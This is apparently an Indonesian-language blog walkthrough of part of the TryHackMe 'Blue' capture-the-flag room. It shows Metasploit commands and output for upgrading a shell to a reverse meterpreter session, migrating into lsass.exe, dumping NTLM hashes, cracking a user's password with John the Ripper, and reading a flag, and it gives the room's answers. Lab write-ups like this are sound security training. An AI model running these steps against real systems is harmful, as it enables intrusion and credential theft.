progrez.cloud

Blue - Tryhackme =} Part 2 | Windows | Easy

01 Maret 2021

klik link berikut untuk melihat cara penggunaannya disini


post/multi/manage/shell_to_meterpreter

Answer = post/multi/manage/shell_to_meterpreter


Pilih ini (gunakan MODULE_PATH). Tunjukkan opsi, opsi apa yang perlu kami ubah?


Opsi yang di ubah adalah pada sesi. Jalankan perintah brikut untuk melihat sesi:

msf6 exploit(windows/smb/ms17_010_eternalblue) > use post/multi/manage/shell_to_meterpreter


Tetapkan opsi yang diperlukan, Anda mungkin perlu membuat daftar semua sesi untuk menemukan target Anda di sini.

msf6 post(multi/manage/shell_to_meterpreter) > sessions -l

Active sessions
===============

 Id Name Type              Information Connection
 -- ---- ----              ----------- ----------
 1        shell x64/windows              10.9.169.148:4444 -> 10.10.40.203:49171 (10.10.40.203)


Lari! Jika ini tidak berhasil, coba selesaikan eksploitasi dari tugas sebelumnya sekali lagi.


msf6 post(multi/manage/shell_to_meterpreter) > run
[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 10.9.169.148:4433 
[*] Post module execution completed
msf6 post(multi/manage/shell_to_meterpreter) > 
[*] Sending stage (175174 bytes) to 10.10.40.203
[*] Meterpreter session 2 opened (10.9.169.148:4433 -> 10.10.40.203:49190) at 2021-03-01 19:40:32 +0900
[*] Stopping exploit/multi/handler


Setelah konversi shell meterpreter selesai, pilih sesi itu untuk digunakan.

msf6 post(multi/manage/shell_to_meterpreter) > sessions -i 2
[*] Starting interaction with 2...

meterpreter >


Verifikasi bahwa kami telah meningkatkan ke NT AUTHORITY SYSTEM. Jalankan Getsystem untuk mengonfirmasi ini. Jangan ragu untuk membuka shell dos melalui perintah 'shell' dan jalankan 'whoami'. Ini harus mengembalikan bahwa kita memang sistem. Latar belakang shell ini setelahnya dan pilih sesi meterpreter kami untuk digunakan lagi.


meterpreter > shell
Process 1312 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:Windowssystem32>whoami
whoami
nt authoritysystem

C:Windowssystem32>exit


Buat daftar semua proses yang berjalan melalui perintah 'ps'. Hanya karena kita adalah sistem, bukan berarti proses kita demikian. Temukan proses di bagian bawah daftar ini yang berjalan di NT AUTHORITY SYSTEM dan tuliskan id proses (kolom paling kiri).


meterpreter > getuid
Server username: NT AUTHORITYSYSTEM

meterpreter > ps

Process List
============

 PID  PPID Name                 Arch Session User                         Path
 ---  ---- ----                 ---- ------- ----                         ----
 0    0    [System Process]                                                  
 4    0    System               x64  0                                     
 416  4    smss.exe             x64  0       NT AUTHORITYSYSTEM          C:WindowsSystem32smss.exe
 444  656  LogonUI.exe          x64  1       NT AUTHORITYSYSTEM          C:WindowsSystem32LogonUI.exe
 464  704  svchost.exe          x64  0       NT AUTHORITYSYSTEM          
 468  704  svchost.exe          x64  0       NT AUTHORITYSYSTEM          
 556  548  csrss.exe            x64  0       NT AUTHORITYSYSTEM          C:WindowsSystem32csrss.exe
 604  548  wininit.exe          x64  0       NT AUTHORITYSYSTEM          C:WindowsSystem32wininit.exe
 616  596  csrss.exe            x64  1       NT AUTHORITYSYSTEM          C:WindowsSystem32csrss.exe
 656  596  winlogon.exe         x64  1       NT AUTHORITYSYSTEM          C:WindowsSystem32winlogon.exe
 704  604  services.exe         x64  0       NT AUTHORITYSYSTEM          C:WindowsSystem32services.exe
 712  604  lsass.exe            x64  0       NT AUTHORITYSYSTEM          C:WindowsSystem32lsass.exe
 720  604  lsm.exe              x64  0       NT AUTHORITYSYSTEM          C:WindowsSystem32lsm.exe
 816  1296 cmd.exe              x64  0       NT AUTHORITYSYSTEM          C:WindowsSystem32cmd.exe
 828  704  svchost.exe          x64  0       NT AUTHORITYSYSTEM          
 896  704  svchost.exe          x64  0       NT AUTHORITYNETWORK SERVICE 
 944  704  svchost.exe          x64  0       NT AUTHORITYLOCAL SERVICE   
 1064 704  svchost.exe          x64  0       NT AUTHORITYLOCAL SERVICE   
 1120 556  conhost.exe          x64  0       NT AUTHORITYSYSTEM          C:WindowsSystem32conhost.exe
 1168 704  svchost.exe          x64  0       NT AUTHORITYNETWORK SERVICE 
 1296 704  spoolsv.exe          x64  0       NT AUTHORITYSYSTEM          C:WindowsSystem32spoolsv.exe
 1332 704  svchost.exe          x64  0       NT AUTHORITYLOCAL SERVICE   
 1404 704  amazon-ssm-agent.exe x64  0       NT AUTHORITYSYSTEM          C:Program FilesAmazonSSMamazon-ssm-agent.exe
 1476 704  LiteAgent.exe        x64  0       NT AUTHORITYSYSTEM          C:Program FilesAmazonXentoolsLiteAgent.exe
 1604 556  conhost.exe          x64  0       NT AUTHORITYSYSTEM          C:WindowsSystem32conhost.exe
 1612 704  Ec2Config.exe        x64  0       NT AUTHORITYSYSTEM          C:Program FilesAmazonEc2ConfigServiceEc2Config.exe
 1940 704  svchost.exe          x64  0       NT AUTHORITYNETWORK SERVICE 
 2072 2556 powershell.exe       x86  0       NT AUTHORITYSYSTEM          C:Windowssyswow64WindowsPowerShellv1.0powershell.exe
 2080 828  WmiPrvSE.exe                                                      
 2416 704  svchost.exe          x64  0       NT AUTHORITYLOCAL SERVICE   
 2528 704  sppsvc.exe           x64  0       NT AUTHORITYNETWORK SERVICE 
 2556 2052 powershell.exe       x64  0       NT AUTHORITYSYSTEM          C:WindowsSystem32WindowsPowerShellv1.0powershell.exe
 2568 704  vds.exe              x64  0       NT AUTHORITYSYSTEM          
 2664 704  svchost.exe          x64  0       NT AUTHORITYSYSTEM          
 2736 704  SearchIndexer.exe    x64  0       NT AUTHORITYSYSTEM          
 3028 704  TrustedInstaller.exe x64  0       NT AUTHORITYSYSTEM          


Migrasikan ke proses ini menggunakan perintah 'migrate PROCESS_ID' di mana id proses adalah yang baru saja Anda tulis di langkah sebelumnya. Ini mungkin membutuhkan beberapa kali percobaan, proses migrasi sangat tidak stabil. Jika ini gagal, Anda mungkin perlu menjalankan ulang proses konversi atau mem-boot ulang mesin dan memulai sekali lagi. Jika ini terjadi, coba proses lain di lain waktu.


Jalankan perintah berikut:

meterpreter > migrate 712
[*] Migrating from 2072 to 712...
[*] Migration completed successfully.
meterpreter > 


Task 4 # Cracking


Hapus kata sandi pengguna non-default dan pecahkan!


Di dalam shell meterpreter kami yang ditinggikan, jalankan perintah 'hashdump'. Ini akan membuang semua kata sandi di mesin selama kami memiliki hak yang benar untuk melakukannya. Apa nama pengguna non-default?


jalankan perintah berikut :

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::
meterpreter >

Answer = Jon


Salin hash kata sandi ini ke file dan teliti cara memecahkannya. Apa kata sandi yang diretas?


Copy kata sandi di atas lalu buka tap terminal baru dan crack dengan john the ripper, simpan dalam satu file. Jalankan perintah berikut untuk crack:

┌─[cyber@cyber]─[~]
└──╼ $john --format=NT --wordlist=rockyou.txt pass.txt 
Using default input encoding: UTF-8
Loaded 2 password hashes with no different salts (NT [MD4 128/128 SSE2 4x3])
Warning: no OpenMP support for this hash type, consider --fork=2
Press 'q' or Ctrl-C to abort, almost any other key for status
                (Administrator)
alqfna22        (Jon)
2g 0:00:00:04 DONE (2021-03-01 20:20) 0.4329g/s 2207Kp/s 2207Kc/s 2208KC/s alqueva1968..alpus
Warning: passwords printed above might not be all those cracked
Use the "--show --format=NT" options to display all of the cracked passwords reliably
Session completed

Answer = alqfna22


Task 5 # Find flags!


Temukan tiga bendera yang ditanam di mesin ini. Ini bukan flag tradisional, melainkan dimaksudkan untuk mewakili lokasi utama dalam sistem Windows. Gunakan petunjuk yang diberikan di bawah ini untuk melengkapi ruangan ini!


Flag1? This flag can be found at the system root.


Jalankan perintah berikut:

meterpreter > pwd
C:Windowssystem32
meterpreter > cd C:/
meterpreter > pwd
C:
meterpreter > dir
Listing: C:
============

Mode             Size    Type Last modified             Name
----             ----    ---- -------------             ----
40777/rwxrwxrwx  0       dir  2009-07-14 12:18:56 +0900 $Recycle.Bin
40777/rwxrwxrwx  0       dir  2009-07-14 14:08:56 +0900 Documents and Settings
40777/rwxrwxrwx  0       dir  2009-07-14 12:20:08 +0900 PerfLogs
40555/r-xr-xr-x  4096    dir  2009-07-14 12:20:08 +0900 Program Files
40555/r-xr-xr-x  4096    dir  2009-07-14 12:20:08 +0900 Program Files (x86)
40777/rwxrwxrwx  4096    dir  2009-07-14 12:20:08 +0900 ProgramData
40777/rwxrwxrwx  0       dir  2018-12-13 12:13:22 +0900 Recovery
40777/rwxrwxrwx  4096    dir  2018-12-13 08:01:17 +0900 System Volume Information
40555/r-xr-xr-x  4096    dir  2009-07-14 12:20:08 +0900 Users
40777/rwxrwxrwx  16384   dir  2009-07-14 12:20:08 +0900 Windows
100666/rw-rw-rw- 24      fil  2018-12-13 12:47:39 +0900 flag1.txt
0000/---------   3996880 fif  1970-02-18 02:52:32 +0900 hiberfil.sys
0000/---------   3996880 fif  1970-02-18 02:52:32 +0900 pagefile.sys

meterpreter > cat flag1.txt
flag{access_the_machine}meterpreter >

Answare = flag{access_the_machine}